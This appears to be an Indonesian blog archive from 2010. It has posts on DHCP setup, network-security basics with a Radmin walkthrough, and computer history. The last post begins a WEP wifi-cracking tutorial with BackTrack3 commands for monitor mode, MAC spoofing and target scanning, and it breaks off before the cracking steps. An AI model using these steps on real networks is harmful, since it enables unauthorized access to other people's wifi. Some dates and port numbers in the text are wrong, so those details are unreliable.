Minggu, 17 Januari 2010

mengatur DHCP

DHCP adalah sebuah protocol yang dapat memberikan IP address secara otomatis ke
suatu workstation yang menggunakan protocol TCP/IP. DHCP bekerja dengan relasi
Client/Server, dimana DHCP server menyediakan range IP address yang dapat diberikan
pada suatu DHCP client. Dalam memberikan IP Address ini, DHCP hanya meminjamkan
(lease). IP Address tersebut untuk suatu periode tertentu. Jika periode tersebut sudah
terlampaui atau tidak diguakan dalam periode waktu waktu tertentu maka IP Address
tersebut dapat diberikan pada Workstation lain yang memerlukan dan terhubung ke
DHCP server tersebut. Jika suatu workstation berada di segment jaringan yag berbeda
maka harus dipergunakan DHCP relay agar workstationtersebut bisa mendapatkan IP
Address.

Dengan memanfaatkan DHCP ini administrator jaringan dapat me-maintenance IP
Address client dari server sehingga setting IP Address pada device client tidak dilakukan
secara manual lagi.

Perencanaan Penggunaan DHCP

Sebelum melakukan instalasi dan konfigurasi DHCP alangkah baiknya perlu
direncanakan dahulu apa saja yang perlu diperhatikan dalam penggunaan DHCP.

1. Definisikan scope (batasan) IP Address yang akan digunakan. Contoh : IP
Address dimulai dari 192.168.10.10 sampai dengan 192.168.10.100 dengan
subnet mask 255.255.255.0.
2. Definisikan mesin-mesin yang menggunakan IP Statik misalnya Server, Router
dsb.

Instalasi DHCP pada Windows 2000 Server

Instalasi DHCP pada Windows 2000 Server sangatlah mudah.Anda hanya memerlukan
CD Installer Windows 2000 Server, kemudian ikuti langkah-langkah seperti berikut ini :
1. Click Start->Control Panel->Add/Remove Programs
2. Click Add/Remove Windows Components
3. Highlight Networking Services kemudian click Details
4. Plilih Dynamic Host Configuration Protocol (DHCP).
5. Click Finish.

Konfigurasi DHCP

Setelah proses instalasi selesai dilakukan, maka langkah selanjutnya adalah melakukan
konfigurasi DHCP. Untuk mengawali proses konfigurasi ini silakan click
Start->Programs->Administratif Tools->DHCP untuk membuka console DHCP
Service seperti terlihat pada gambar dibawah ini :
Ketika anda akan mengkonfigurasi service DHCP, maka pertama kali yang harus
dipikirkan adalah scope IP yang akan anda gunakan. Scope adalah daftar IP yang valid
yang akan digunakan oleh masing-masing client.
Untuk mendefinisikan scope ikuti langkah-langkah seperti dibawah ini :

1। Pilih menu Action, pilih New Scope untuk menjalankan Create Scope Wizard, kemudian click Next।
2. Isikan nama scope dan deskripsi dari scope tersebut.
3. isikan start dan end scope IP Address sesuai dengan kebutuhan.
4. dalam sebuah scope bisa jadi terdapat IP Address static yang di-exclude dari sebuah scope।
5. Langkah selanjurnya aktifkan durasi waktu pergantian IP Address untuk masing-
masing client।
6. Aktifkan scope. Ini merupakan langkah yang terakhir untuk mengaktifkan scope
yang telah anda konfigurasi.
7. click Finish. Sampai disini konfigurasi DHCP telah selesai anda lakukan

Rabu, 13 Januari 2010

keamanan jaringan

Keamanan jaringan secara umum adalah computer yang terhubung ke network, mempunyai ancaman keamanan lebih besar daripada computer yang tidak terhubung ke mana-mana. Dengan pengendalian yang teliti, resiko tersebut dapat dikurangi. Namun network security biasanya bertentangan dengan network access, dimana bila network access semakin mudah, maka network security semakin rawan, dan bila network security semakin baik, network access semakin tidak nyaman. Suatu network didesain sebagai komunikasi data highway dengan tujuan meningkatkan akses ke system computer, sementara security didesain untuk mengontrol akses. Penyediaan network security adalah sebagai akses penyeimbang antara open acesss dengan security.

Disini network dikatakan sebagai highway karena menyediakan akses yang sama untuk semua, baik pengguna normal ataupun tamu yang tidak diundang. Sebagai analogi, keamanan dirumah dilakukan dengan memberi kunci dipintu rumah, tidak dengan cara memblokir jalan didepan rumah. Hal seperti ini juga diterapkan pada network security. Keamanan dijaga untuk (Setiap) host host tertentu, tidak langsung pada networknya.

Langkah awal dalam mengembangkan rencana network securiy yang efektif dengan mengenali ancaman yang mungkin datang. Dalam RFC 1244, Site Security Handbook, dibedakan tiga tipe ancaman:
1. Akses tidak sah oleh orang yang tidak mempunyai wewenang
2. Kesalahan informasi, segala masalah yang dapat menyebabkan diberikannya informasi yang penting atau sensitive kepada orang yang salah, yang seharusnya tidak boleh mendapatkan informasi tersebut.
3. Penolakan terhadap service, segala masalah mengenai security yang menyebabkan system mengganggu pekerjaan-pekerjaan yang produktif

Jenis Serangan
Jenis dan teknik serangan yang menganggu jaringan computer beraneka macam, diantaranya:
• IP SPOOFING.
IP Spoofing yaitu pemalsuan alamat IP penyusup sehingga sasaran menganggap alamat IP penyusup adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan penyusup mempunyai IP address type A 66.25.xx.xx ketika penyusup melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang penyusup ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan ecara transparan dan jelas sehingga membuat penyusup dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh penyusup tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para penyusup.
• Password Attacks.
Password merupakan sesuatu yang umum jika kita bicara tentang keamanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang penyusup mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password. Ketika seorang penyusup berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing. Penebakan(guessing) password bisa dilakukan dengan cara memasukan password satu persatu secara
• .REMOTE FILE SYSTEM ATTACKS.
Protokol-protokol untuk tranportasi data yang merupakan tulang punggung dari internet adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Penyusup bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file. Tergantung pada OS (operating system) yang digunakan, penyusup bisa meng extrack informasi tentang network, sharing privileges, nama dan lokasi dari user dan groups, dan spesifikasi dari aplikasi atau banner (nama dan versi software). System yang dikonfigurasi atau diamankan secara minimal akan dengan mudah membeberkan informasi ini bahkan melalui firewall sekalipun. Pada system UNIX, informasi ini dibawa oleh NFS (Network File System) di port 204, sedangkan Windows menyediakan data ini pada SMB (server messaging block) dan Netbios pada port 135 - 139(NT) dan port 445 pada win2k. Network administrator bisa meminimalisasi resiko yang akan terjadi dengan menggunakan Protokol-protokol tersebut dengan memberikan sedikit peraturan. Network dengan sistem operasi windows, harusnya memblok akses ke port 139 dan 445 dari luar network, jika dimungkinkan. Dalam system unix port 2049 seharusnya di blok, sharing file dibatasi dan permintaan file melalui showmount (perintah dalam unix) seharusnya di catat dalam log.s
• Studi Kasus
Untuk lebih memahami tentang keamanan jaringan maka dalam modul ini di bahas penggunaan remote computer, menggunakan software Radmin yang dapat diunduh dari www.radmin.com/
Fasilitas yang terdapat dalam Remote Admin:
• Dapat mengatur atau mengendalikan computer yang telah di install remote service dari jarak jauh
• Dapat memonitor computer dari jarak jauh
• Dapat menshutdown dan merestart computer
• Dapat melakukan pertukaran data antara komputer
Untuk menggunakan radmin, terdapat beberapa langkah:
Penginstalan Remote Server, beberapa tahap penginstalan, dengan menjalankan file rserver.exe.

Gambar 1. Instalasi Remote Server


Gambar 2. Proses Instalasi





Gambar 3. Proses Instalasi

Gambar 4. Proses Instalasi radmin selesai.

Untuk mengatur komputer dari jarak jauh, maka instlasi remote viewer, instlasi dapat dilakukan di komputer yang berbeda.
• Install Remote Viewer:

Gambar 5. Proses install remote Viewer

Gambar 6. Proses instalasi
Lokasi instalasi remote viewer, setelah tahap instalasi maka tampilan untuk meremote radmin server seperti pada gambar dibawah ini

Gambar 7. Remote viewer
Aktifkan service remote, dengan memilih setting for radmin server
Konfigurasi Server
Selanjutnya, setelah tahap instalasi, dilanjutkan dengan tahap konfigurasi server,


Gambar 8. Konfigurasi remote server
Dalam tahapan ini dapat dilakukan pengerjaan secara langsung.
Beberapa fasilitas yang terdapat dalam pilihan radmin server :
• Menjalankan Secara Start up
Untuk dijalankan sewaktu startup dapat memilih option startup mode pada gambar , kemudian dilanjutkan pada gambar ,dengan memilih automatic ataupun manual.

Gambar 9. Set Startup Mode

Untuk melihat hasil dari pilihan yang dilakukan, dapat melakukan restart komputer dan menguji dari fungsi yang telah dipilih.
• Mengubah Port Pada Radmin Server
Untuk mengubah port number pada remote admin, dapat memilih pilihan general, dan dapat mengubah pilihan port number.

Gambar 10. Pengubahan port untuk remote admin




Pengaktifan Metode fungsi dapat dilakukan di Miscellaneouss.
Dapat memilih layanan yang dapat digunakan dalam meremote komputer.


Gambar 11. Pemilihan disable fungsi
Option Enable filter digunakan untuk memilih ip address yang dapat digunakan untuk mengakses komputer jarak jauh, seperti pada gambar

Gambar 12. Pemilihan filtering IP

• Chat Option
Chat option dapat digunakan untuk melakukan chat diantara remote admin yang telah diinstall sebelumnya.Option ini membantu untuk merubah nick name dan informasi pesan pada chatting.

Gambar 13. Option Chat
Untuk kemananan pada Remote admin, dapat dilakukan dengan pemberian password dengan password yang dibentuk sendiri atau dari passoword yang sudah disediakan oleh windows NT seperti pada gambar

Gambar 14. Authentifikasi

Jumat, 08 Januari 2010

sejarah komputer

Sejarah komputer sudah dimulai sejak zaman dahulu kala. Sejak dahulu kala, proses pengolahan data telah dilakukan oleh manusia. Manusia juga menemukan alat-alat mekanik dan elektronik untuk membantu manusia dalam penghitungan dan pengolahan data supaya bisa mendapatkan hasil lebih cepat. Komputer yang kita temui saat ini adalah suatu evolusi panjang dari penemuan-penemuan manusia sejak dahulu kala berupa alat mekanik maupun elektronik

Saat ini komputer dan piranti pendukungnya telah masuk dalam setiap aspek kehidupan dan pekerjaan. Komputer yang ada sekarang memiliki kemampuan yang lebih dari sekedar perhitungan matematik biasa. Diantaranya adalah sistem komputer di kassa supermarket yang mampu membaca kode barang belanja, sentral telepon yang menangani jutaan panggilan dan komunikasi, jaringan komputer dan internet yang menghubungkan berbagai tempat di dunia.


Sejarah Komputer menurut periodenya adalah:

* Alat Hitung Tradisional dan Kalkulator Mekanik

* Komputer Generasi Pertama

* Komputer Generasi Kedua

* Komputer Generasi Ketiga

* Komputer Generasi Keempat

* Komputer Generasi Kelima



ALAT HITUNG TRADISIONAL dan KALKULATOR MEKANIKAbacus, yang muncul sekitar 5000 tahun yang lalu di Asia kecil dan masih digunakan di beberapa tempat hingga saat ini dapat dianggap sebagai awal mula mesin komputasi.Alat ini memungkinkan penggunanya untuk melakukan perhitungan menggunakan biji-bijian geser yang diatur pada sebuah rak. Para pedagang di masa itu menggunakan abacus untuk menghitung transaksi perdagangan. Seiring dengan munculnya pensil dan kertas, terutama di Eropa, abacus kehilangan popularitasnya


Setelah hampir 12 abad, muncul penemuan lain dalam hal mesin komputasi. Pada tahun 1642, Blaise Pascal (1623-1662), yang pada waktu itu berumur 18 tahun, menemukan apa yang ia sebut sebagai kalkulator roda numerik (numerical wheel calculator) untuk membantu ayahnya melakukan perhitungan pajak


Kotak persegi kuningan ini yang dinamakan Pascaline, menggunakan delapan roda putar bergerigi untuk menjumlahkan bilangan hingga delapan digit. Alat ini merupakan alat penghitung bilangan berbasis sepuluh. Kelemahan alat ini adalah hanya terbatas untuk melakukan penjumlahan


Tahun 1694, seorang matematikawan dan filsuf Jerman, Gottfred Wilhem von Leibniz (1646-1716) memperbaiki Pascaline dengan membuat mesin yang dapat mengalikan. Sama seperti pendahulunya, alat mekanik ini bekerja dengan menggunakan roda-roda gerigi. Dengan mempelajari catatan dan gambar-gambar yang dibuat oleh Pascal, Leibniz dapat menyempurnakan alatnya.


Barulah pada tahun 1820, kalkulator mekanik mulai populer. Charles Xavier Thomas de Colmar menemukan mesin yang dapat melakukan empat fungsi aritmatik dasar. Kalkulator mekanik Colmar, arithometer, mempresentasikan pendekatan yang lebih praktis dalam kalkulasi karena alat tersebut dapat melakukan penjumlahan, pengurangan, perkalian, dan pembagian. Dengan kemampuannya, arithometer banyak dipergunakan hingga masa Perang Dunia I. Bersama-sama dengan Pascal dan Leibniz, Colmar membantu membangun era komputasi mekanikal.


Awal mula komputer yang sebenarnya dibentuk oleh seorang profesor matematika Inggris, Charles Babbage (1791-1871). Tahun 1812, Babbage memperhatikan kesesuaian alam antara mesin mekanik dan matematika yaitu mesin mekanik sangat baik dalam mengerjakan tugas yang sama berulangkali tanpa kesalahan; sedang matematika membutuhkan repetisi sederhana dari suatu langkah-langkah tertenu. Masalah tersebut kemudain berkembang hingga menempatkan mesin mekanik sebagai alat untuk menjawab kebutuhan mekanik. Usaha Babbage yang pertama untuk menjawab masalah ini muncul pada tahun 1822 ketika ia mengusulkan suatu mesin untuk melakukanperhitungan persamaan differensial. Mesin tersebut dinamakan Mesin Differensial. Dengan menggunakan tenaga uap, mesin tersebut dapat menyimpan program dan dapat melakukan kalkulasi serta mencetak hasilnya secara otomatis.


Setelah bekerja dengan Mesin Differensial selama sepuluh tahun, Babbage tiba-tiba terinspirasi untuk memulai membuat komputer general-purpose yang pertama, yang disebut Analytical Engine. Asisten Babbage, Augusta Ada King (1815-1842) memiliki peran penting dalam pembuatan mesin ini. Ia membantu merevisi rencana, mencari pendanaan dari pemerintah Inggris, dan mengkomunikasikan spesifikasi Analytical Engine kepada publik. Selain itu, pemahaman Augusta yang baik tentang mesin ini memungkinkannya membuat instruksi untuk dimasukkan ke dalam mesin dan juga membuatnya menjadi programmer wanita yang pertama. Pada tahun 1980, Departemen Pertahanan Amerika Serikat menamakan sebuah bahasa pemrograman dengan nama ADA sebagai penghormatan kepadanya.


Mesin uap Babbage, walaupun tidak pernah selesai dikerjakan, tampak sangat primitif apabila dibandingkan dengan standar masa kini. Bagaimanapun juga, alat tersebut menggambarkan elemen dasar dari sebuah komputer modern dan juga mengungkapkan sebuah konsep penting. Terdiri dari sekitar 50.000 komponen, disain dasar dari Analytical Engine menggunakan kartu-kartu perforasi (berlubang-lubang) yang berisi instruksi operasi bagi mesin tersebut.


Pada 1889, Herman Hollerith (1860-1929) juga menerapkan prinsip kartu perforasi untuk melakukan penghitungan. Tugas pertamanya adalah menemukan cara yang lebih cepat untuk melakukan perhitungan bagi Biro Sensus Amerika Serikat. Sensus sebelumnya yang dilakukan di tahun 1880 membutuhkan waktu tujuh tahun untuk menyelesaikan perhitungan. Dengan berkembangnya populasi, Biro tersebut memperkirakan bahwa dibutuhkan waktu sepuluh tahun untuk menyelesaikan perhitungan sensus.


Hollerith menggunakan kartu perforasi untuk memasukkan data sensus yang kemudian diolah oleh alat tersebut secara mekanik. Sebuah kartu dapat menyimpan hingga 80 variabel. Dengan menggunakan alat tersebut, hasil sensus dapat diselesaikan dalam waktu enam minggu. Selain memiliki keuntungan dalam bidang kecepatan, kartu tersebut berfungsi sebagai media penyimpan data. Tingkat kesalahan perhitungan juga dapat ditekan secara drastis. Hollerith kemudian mengembangkan alat tersebut dan menjualnya ke masyarakat luas. Ia mendirikan Tabulating Machine Company pada tahun 1896 yang kemudian menjadi International Business Machine (1924) setelah mengalami beberapa kali merger. Perusahaan lain seperti Remington Rand and Burroghs juga memproduksi alat pembaca kartu perforasi untuk usaha bisnis. Kartu perforasi digunakan oleh kalangan bisnis dn pemerintahan untuk permrosesan data hingga tahun 1960.


Pada masa berikutnya, beberapa insinyur membuat penemuan baru lainnya. Vannevar Bush (18901974) membuat sebuah kalkulator untuk menyelesaikan persamaan differensial di tahun 1931. Mesin tersebut dapat menyelesaikan persamaan differensial kompleks yang selama ini dianggap rumit oleh kalangan akademisi. Mesin tersebut sangat besar dan berat karena ratusan gerigi dan poros yang dibutuhkan untuk melakukan perhitungan. Pada tahun 1903, John V. Atanasoff dan Clifford Berry mencoba membuat komputer elektrik yang menerapkan aljabar Boolean pada sirkuit elektrik. Pendekatan ini didasarkan pada hasil kerja George Boole (1815-1864) berupa sistem biner aljabar, yang menyatakan bahwa setiap persamaan matematik dapat dinyatakan sebagai benar atau salah. Dengan mengaplikasikan kondisi benar-salah ke dalam sirkuit listrik dalam bentuk terhubung-terputus, Atanasoff dan Berry membuat komputer elektrik pertama di tahun 1940. Namun proyek mereka terhenti karena kehilangan sumber pendanaan.


KOMPUTER GENERASI PERTAMA

Dengan terjadinya Perang Dunia Kedua, negara-negara yang terlibat dalam perang tersebut berusaha mengembangkan komputer untuk mengeksploitasi potensi strategis yang dimiliki komputer. Hal ini meningkatkan pendanaan pengembangan komputer serta mempercepat kemajuan teknik komputer. Pada tahun 1941, Konrad Zuse, seorang insinyur Jerman membangun sebuah komputer Z3, untuk mendisain pesawat terbang dan peluru kendali.


Pihak sekutu juga membuat kemajuan lain dalam pengembangan kekuatan komputer. Tahun 1943, pihak Inggris menyelesaikan komputer pemecah kode rahasia yang dinamakan Colossus untuk memecahkan kode-rahasia yang digunakan Jerman. Dampak pembuatan Colossus tidak terlalu mempengaruhi perkembangan industri komputer dikarenakan dua alasan. Pertama, colossus bukan merupakan komputer serbaguna general-purpose computer), ia hanya didisain untuk memecahkan kode rahasia. Kedua, keberadaan mesin ini dijaga kerahasiaannya hingga satu dekade setelah perang berakhir.


Usaha yang dilakukan oleh pihak Amerika pada saat itu menghasilkan suatu kemajuan lain. Howard H. Aiken (1900-1973), seorang insinyur Harvard yang bekerja dengan IBM, berhasil memproduksi kalkulator elektronik untuk US Navy. Kalkulator tersebut berukuran panjang setengah lapangan bola kaki dan memiliki rentang kabel sepanjang 500 mil. The Harvd-IBM Automatic Sequence Controlled Calculator, atau Mark I, merupakan komputer relai elektronik. Ia menggunakan sinyal elektromagnetik untuk menggerakkan komponen mekanik. Mesin tersebut beropreasi dengan lambat (ia membutuhkan 3-5 detik untuk setiap perhitungan) dan tidak fleksibel (urutan kalkulasi tidak dapat diubah). Kalkulator tersebut dapat melakukan perhitungan aritmatik dasar dan persamaan yang lebih kompleks.


Perkembangan komputer lain pada masa ini adalah Electronic Numerical Integrator and Computer (ENIAC), yang dibuat oleh kerjasama antara pemerintah Amerika Serikat dan University of Pennsylvania. Terdiri dari 18.000 tabung vakum, 70.000 resistor, dan 5 juta titik solder, komputer tersebut merupakan mesin yang sangat besar yang mengkonsumsi daya sebesar 160kW. Komputer ini dirancang oleh John Presper Eckert (1919-1995) dan John W. Mauchly (1907-1980), ENIAC merupakan komputer serbaguna (general purpose computer) yang bekerja 1000 kali lebih cepat dibandingkan Mark I.Pada pertengahan 1940-an, John von Neumann (1903-1957) bergabung dengan tim University of Pennsylvania dalam usha membangun konsep desin komputer yang hingga 40 tahun mendatang masih dipakai dalam teknik komputer.


Von Neumann mendesain Electronic Discrete Variable Automatic Computer(EDVAC) pada tahun 1945 dengan sebuah memori untuk menampung baik program ataupun data. Teknik ini memungkinkan komputer untuk berhenti pada suatu saat dan kemudian melanjutkan pekerjaannya kembali. Kunci utama arsitektur von Neumann adalah unit pemrosesan sentral (CPU), yang memungkinkan seluruh fungsi komputer untuk dikoordinasikan melalui satu sumber tunggal. Tahun 1951, UNIVAC I (Universal Automatic Computer I) yang dibuat oleh Remington Rand, menjadi komputer komersial pertama yang memanfaatkan model arsitektur von Neumann tersebut. Baik Badan Sensus Amerika Serikat dan General Electric memiliki UNIVAC. Salah satu hasil mengesankan yang dicapai oleh UNIVAC dalah keberhasilannya dalam memprediksi kemenangan Dwilight D. Eisenhower dalam pemilihan presiden tahun 1952.


Komputer Generasi pertama dikarakteristik dengan fakta bahwa instruksi operasi dibuat secara spesifik untuk suatu tugas tertentu. Setiap komputer memiliki program kode-biner yang berbeda yang disebut "bahasa mesin" (machine language). Hal ini menyebabkan komputer sulit untuk diprogram dan membatasi kecepatannya. Ciri lain komputer generasi pertama adalah penggunaan tube vakum (yang membuat komputer pada masa tersebut berukuran sangat besar) dan silinder magnetik untuk penyimpanan data.


KOMPUTER GENERASI KEDUA

Pada tahun 1948, penemuan transistor sangat mempengaruhi perkembangan komputer. Transistor menggantikan tube vakum di televisi, radio, dan komputer. Akibatnya, ukuran mesin-mesin elektrik berkurang drastis. Transistor mulai digunakan di dalam komputer mulai pada tahun 1956. Penemuan lain yang berupa pengembangan memori inti-magnetik membantu pengembangan komputer generasi kedua yang lebih kecil, lebih cepat, lebih dapat diandalkan, dan lebih hemat energi dibanding para pendahulunya. Mesin pertama yang memanfaatkan teknologi baru ini adalah superkomputer. IBM membuat superkomputer bernama Stretch, dan Sprery-Rand membuat komputer bernama LARC. Komputer-komputer ini, yang dikembangkan untuk laboratorium energi atom, dapat menangani sejumlah besar data, sebuah kemampuan yang sangat dibutuhkan oleh peneliti atom. Mesin tersebut sangat mahal dan cenderung terlalu kompleks untuk kebutuhan komputasi bisnis, sehingga membatasi kepopulerannya. Hanya ada dua LARC yang pernah dipasang dan digunakan: satu di Lawrence Radiation Labs di Livermore, California, dan yang lainnya di US Navy Research and Development Center di Washington D.C. Komputer generasi kedua menggantikan bahasa mesin dengan bahasa assembly. Bahasa assembly adalah bahasa yang menggunakan singkatan-singkatan untuk menggantikan kode biner.


Pada awal 1960-an, mulai bermunculan komputer generasi kedua yang sukses di bidang bisnis, di universitas, dan di pemerintahan. Komputer-komputer generasi kedua ini merupakan komputer yang sepenuhnya menggunakan transistor. Mereka juga memiliki komponen-komponen yang dapat diasosiasikan dengan komputer pada saat ini: printer, penyimpanan dalam disket, memory, sistem operasi, dan program. Salah satu contoh penting komputer pada masa ini adalah IBM 1401 yang diterima secara luas di kalangan industri. Pada tahun 1965, hampir seluruh bisnis-bisnis besar menggunakan komputer generasi kedua untuk memproses informasi keuangan.


Program yang tersimpan di dalam komputer dan bahasa pemrograman yang ada di dalamnya memberikan fleksibilitas kepada komputer. Fleksibilitas ini meningkatkan kinerja dengan harga yang pantas bagi penggunaan bisnis. Dengan konsep ini, komputer dapat mencetak faktur pembelian konsumen dan kemudian menjalankan desain produk atau menghitung daftar gaji. Beberapa bahasa pemrograman mulai bermunculan pada saat itu. Bahasa pemrograman Common Business-Oriented Language (COBOL) dan Formula Translator (FORTRAN) mulai umum digunakan. Bahasa pemrograman ini menggantikan kode mesin yang rumit dengan kata-kata, kalimat, dan formula matematika yang lebih mudah dipahami oleh manusia. Hal ini memudahkan seseorang untuk memprogram dan mengatur komputer. Berbagai macam karir baru bermunculan (programmer, analyst, dan ahli sistem komputer). Industri piranti lunak juga mulai bermunculan dan berkembang pada masa komputer generasi kedua ini.


KOMPUTER GENERASI KETIGA

Walaupun transistor dalam banyak hal mengungguli tube vakum, namun transistor menghasilkan panas yang cukup besar, yang dapat berpotensi merusak bagian-bagian internal komputer. Batu kuarsa (quartz rock) menghilangkan masalah ini. Jack Kilby, seorang insinyur di Texas Instrument, mengembangkan sirkuit terintegrasi (IC: integrated circuit) di tahun 1958. IC mengkombinasikan tiga komponen elektronik dalam sebuah piringan silikon kecil yang terbuat dari pasir kuarsa. Para ilmuwan kemudian berhasil memasukkan lebih banyak komponen-komponen ke dalam suatu chip tunggal yang disebut semikonduktor. Hasilnya, komputer menjadi semakin kecil karena komponen-komponen dapat dipadatkan dalam chip. Kemajuan komputer generasi ketiga lainnya adalah penggunaan sistem operasi (operating system) yang memungkinkan mesin untuk menjalankan berbagai program yang berbeda secara serentak dengan sebuah program utama yang memonitor dan mengkoordinasi memori komputer.


KOMPUTER GENERASI KEEMPAT

Setelah IC, tujuan pengembangan menjadi lebih jelas yaitu mengecilkan ukuran sirkuit dan komponen-komponen elektrik. Large Scale Integration (LSI) dapat memuat ratusan komponen dalam sebuah chip. Pada tahun 1980-an, Very Large Scale Integration (VLSI) memuat ribuan komponen dalam sebuah chip tunggal.Ultra-Large Scale Integration (ULSI) meningkatkan jumlah tersebut menjadi jutaan. Kemampuan untuk memasang sedemikian banyak komponen dalam suatu keping yang berukuran setengah keping uang logam mendorong turunnya harga dan ukuran komputer. Hal tersebut juga meningkatkan daya kerja, efisiensi dan kehandalan komputer. Chip Intel 4004 yang dibuat pada tahun 1971 membawa kemajuan pada IC dengan meletakkan seluruh komponen dari sebuah komputer (central processing unit, memori, dan kendali input/output) dalam sebuah chip yangsangat kecil. Sebelumnya, IC dibuat untuk mengerjakan suatu tugas tertentu yang spesifik. Sekarang, sebuah mikroprosesor dapat diproduksi dan kemudian diprogram untuk memenuhi seluruh kebutuhan yang diinginkan. Tidak lama kemudian, setiap perangkat rumah tangga seperti microwave oven, televisi, dan mobil dengan electronic fuel injection dilengkapi dengan mikroprosesor.


Perkembangan yang demikian memungkinkan orang-orang biasa untuk menggunakan komputer biasa. Komputer tidak lagi menjadi dominasi perusahaan-perusahaan besar atau lembaga pemerintah. Pada pertengahan tahun 1970-an, perakit komputer menawarkan produk komputer mereka ke masyarakat umum. Komputer-komputer ini, yang disebut minikomputer, dijual dengan paket piranti lunak yang mudah digunakan oleh kalangan awam. Piranti lunak yang paling populer pada saat itu adalah program word processing dan spreadsheet. Pada awal 1980-an, video game seperti Atari 2600 menarik perhatian konsumen pada komputer rumahan yang lebih canggih dan dapat diprogram.Pada tahun 1981, IBM memperkenalkan penggunaan Personal Computer (PC) untuk penggunaan di rumah, kantor, dan sekolah. Jumlah PC yang digunakan melonjak dari 2 juta unit di tahun 1981 menjadi 5,5 juta unit di tahun 1982. Sepuluh tahun kemudian, 65 juta PC digunakan. Komputer melanjutkan evolusinya menuju ukuran yang lebih kecil, dari komputer yang berada di atas meja (desktop computer) menjadi komputer yang dapat dimasukkan ke dalam tas (laptop), atau bahkan komputer yang dapat digenggam (palmtop).


IBM PC bersaing dengan Apple Macintosh dalam memperebutkan pasar komputer. Apple Macintosh menjadi terkenal karena mempopulerkan sistem grafis pada komputernya, sementara saingannya masih menggunakan komputer yang berbasis teks. Macintosh juga mempopulerkan penggunaan piranti mouse.


Pada masa sekarang, kita mengenal perjalanan IBM compatible dengan pemakaian CPU: IBM PC/486, Pentium, Pentium II, Pentium III, Pentium IV (Serial dari CPU buatan Intel). Juga kita kenal AMD k6, Athlon, dsb. Ini semua masuk dalam golongan komputer generasi keempat. Seiring dengan menjamurnya penggunaan komputer di tempat kerja, cara-cara baru untuk menggali potensi terus dikembangkan. Seiring dengan bertambah kuatnya suatu komputer kecil, komputer-komputer tersebut dapat dihubungkan secara bersamaan dalam suatu jaringan untuk saling berbagi memori, piranti lunak, informasi, dan juga untuk dapat saling berkomunikasi satu dengan yang lainnya. Komputer jaringan memungkinkan komputer tunggal untuk membentuk kerjasama elektronik untuk menyelesaikan suatu proses tugas. Dengan menggunakan perkabelan langsung (disebut juga local area network, LAN), atau kabel telepon, jaringan ini dapat berkembang menjadi sangat besar.


KOMPUTER GENERASI KELIMA

Mendefinisikan komputer generasi kelima menjadi cukup sulit karena tahap ini masih sangat muda. Contoh imajinatif komputer generasi kelima adalah komputer fiksi HAL9000 dari novel karya Arthur C. Clarke berjudul 2001:Space Odyssey. HAL menampilkan seluruh fungsi yang diinginkan dari sebuah komputer generasi kelima. Dengan kecerdasan buatan (artificial intelligence), HAL dapat cukup memiliki nalar untuk melakukan percapakan dengan manusia, menggunakan masukan visual, dan belajar dari pengalamannya sendiri.


Walaupun mungkin realisasi HAL9000 masih jauh dari kenyataan, banyak fungsi-fungsi yang dimilikinya sudah terwujud. Beberapa komputer dapat menerima instruksi secara lisan dan mampu meniru nalar manusia. Kemampuan untuk menterjemahkan bahasa asing juga menjadi mungkin. Fasilitas ini tampak sederhan. Namun fasilitas tersebut menjadi jauh lebih rumit dari yang diduga ketika programmer menyadari bahwa pengertian manusia sangat bergantung pada konteks dan pengertian daripada sekedar menterjemahkan kata-kata secara langsung.


Banyak kemajuan di bidang disain komputer dan teknologi semakin memungkinkan pembuatan komputer generasi kelima. Dua kemajuan rekayasa yang terutama adalah kemampuan pemrosesan paralel, yang akan menggantikan model von Neumann. Model von Neumann akan digantikan dengan sistem yang mampu mengkoordinasikan banyak CPU untuk bekerja secara serempak. Kemajuan lain adalah teknologi superkonduktor yang memungkinkan aliran elektrik tanpa ada hambatan apapun, yang nantinya dapat mempercepat kecepatan informasi.


Jepang adalah negara yang terkenal dalam sosialisasi jargon dan proyek komputer generasi kelima. Lembaga ICOT (Institute for new Computer Technology) juga dibentuk untuk merealisasikannya. Banyak kabar yang menyatakan bahwa proyek ini telah gagal, namun beberapa informasi lain bahwa keberhasilan proyek komputer generasi kelima ini akan membawa perubahan baru paradigma komputerisasi di dunia. Kita tunggu informasi mana yang lebih valid dan membuahkan hasil.

menjebol password wep wifi, dengan backtrack3

Dalam hal membuka password WEP ini,sebenarnya relatip gampang,yg dibutuhkan Cuma sabar dan teliti

Ayo kita mulai….

Siapkan dulu Backtrack3 live CD nya (selanjutnya akan di singkat BT)

Masukkan ke room CD dan restart.jika Bootingnya berhasil maka akan muncul gambar ini

Perhatikan dalam penulisan jangan sampai salah.harap perhatikan juga (- — ataupun spasinya)

Buka konsol pertama,lalu ketik iwconfig

Disini saya menggunakan wireless Alfa usb.sehingga interfacenya muncul wlan0.(selanjutnya akan saya sebut “DEVICE”).karna mungkin anda menggunakan yg lainnya

Lalu ketik airmon-ng stop (device) seperti ini

Ketik

ifconfig (device) down

macchanger –mac 00:11:22:33:44:55 (device)

airmon-ng start (device)

Ketik airodump-ng (device)

Setelah command tersebut,maka langsung muncul layar seperti ini

Pilih sasaran yg akan dijadikan mangsanya.(ingat,hanya WEP,bukan WPA/WPA2 atau yg lainnya)

